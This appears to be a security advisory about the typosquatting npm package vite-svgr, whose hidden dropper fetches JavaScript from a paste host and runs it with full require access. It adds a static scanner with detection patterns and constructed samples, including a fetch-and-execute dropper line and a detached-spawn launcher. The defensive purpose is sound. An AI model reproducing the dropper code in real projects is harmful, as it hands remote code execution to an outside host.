Vulnerability
Malicious code in vite-svgr (npm)
Source: amazon-inspector (a22a309bc488d107fc2734705e05bb4032432bb9b54391e8ee2325d980b2cdf5)

Package name `vite-svgr` impersonates the popular `vite-plugin-svgr`, but the shipped code is a fork of `tsconfig-paths` (package.json description: 'Load node modules according to tsconfig paths') with an added remote-code-execution dropper at lib/mapProps.js. The dropper performs `axios.get('https://www.jsonkeeper.com/b/EQUBH', { headers: { 'x-secret-key': '_' } })` and then runs the response body's `Cookie` field via `new Function('require', s)(require）`: arbitrary JavaScript with full Node `require` access, executed under the installer's user. The code is reachable from the package's `main` via the exported `configJson(...)`, which spawns `node lib/mapProps.js` detached, so any consumer that imports this package and calls `configJson` triggers fetch-and-execute against an anonymous, mutable paste host. The combination of name impersonation, a fork of an unrelated library, and remote-payload execution is the canonical supply-chain attack shape.
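Heuristic detection for the fetch-and-execute shape this advisory describes, as an added example that is not code from the advisory, Amazon Inspector, or either package; the scanner, the sample sources and the paste path in them are constructed for illustration.

```javascript
// Added example (not from the advisory or either package): a static scan that flags
// the dropper shape described above, i.e. a runtime network fetch whose response is
// handed to `new Function('require', ...)`, optionally launched as a detached child.
// Meant for CI or pre-install review of files under node_modules.
const INDICATORS = [
  { id: 'remote-fetch', note: 'network request at runtime',
    re: /\b(?:axios\.(?:get|post)|fetch|https?\.(?:get|request))\s*\(/ },
  { id: 'paste-host', note: 'URL points at the paste host named in the advisory',
    re: /https?:\/\/(?:www\.)?jsonkeeper\.com\//i },
  { id: 'eval-with-require', note: 'fetched text executed with full `require` access',
    re: /new\s+Function\s*\(\s*['"`]require['"`]\s*,/ },
  { id: 'dynamic-eval', note: 'dynamic code evaluation',
    re: /\b(?:eval|new\s+Function)\s*\(/ },
  { id: 'detached-child', note: 'child process started detached from the installer',
    re: /\b(?:spawn|fork)\s*\([\s\S]{0,400}?detached\s*:\s*true/ },
];

// Return the ids of every indicator present in a JavaScript source string.
function scanSource(source) {
  return INDICATORS.filter(i => i.re.test(source)).map(i => i.id);
}

// Rate a file: fetch plus dynamic evaluation is the high-confidence dropper
// signature; a lone eval or detached child is worth review but common in tooling.
function rate(findings) {
  const has = id => findings.includes(id);
  if (has('remote-fetch') && (has('eval-with-require') || has('dynamic-eval'))) return 'high';
  if (['eval-with-require', 'dynamic-eval', 'detached-child', 'paste-host'].some(has)) return 'medium';
  return 'low';
}

// Constructed samples (not the real lib/mapProps.js; the paste path is a placeholder).
const SAMPLE_DROPPER = `
const axios = require('axios');
axios.get('https://www.jsonkeeper.com/b/PLACEHOLDER', { headers: { 'x-secret-key': '_' } })
  .then(r => new Function('require', r.data.Cookie)(require));
`;
const SAMPLE_LAUNCHER = `
const { spawn } = require('child_process');
spawn(process.execPath, ['lib/mapProps.js'], { detached: true, stdio: 'ignore' }).unref();
`;
const SAMPLE_BENIGN = `
const path = require('path');
module.exports = p => path.resolve(__dirname, p);
`;

if (typeof require !== 'undefined' && require.main === module) {
  for (const [name, src] of Object.entries({ SAMPLE_DROPPER, SAMPLE_LAUNCHER, SAMPLE_BENIGN })) {
    const f = scanSource(src);
    console.log(`${name}: ${rate(f)} ${f.join(', ') || '(no indicators)'}`);
  }
}
```

The launcher sample rates only medium on its own; the point of the scan is that the detached spawn and the fetch-and-execute file are scored together once both are found in the same package.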
No CVSS base score from NVD or GHSA yet. NVD typically scores within 24–72 hours of publication; GHSA usually within a day for OSS-flagged CVEs. Last record update .
For interim severity, fall back on KEV / EXPLOIT signals and the EPSS percentile (lower panel). Re-check this CVE after one cron tick — the score lands automatically when the source publishes.
FIRST.org publishes EPSS daily. Coverage isn't universal — pre-disclosure CVEs and reserved IDs don't carry an EPSS score until at least one exploitation signal lands. Score will appear within 24 hours of the next EPSS pull.
No exploitation, limited impact or prevalence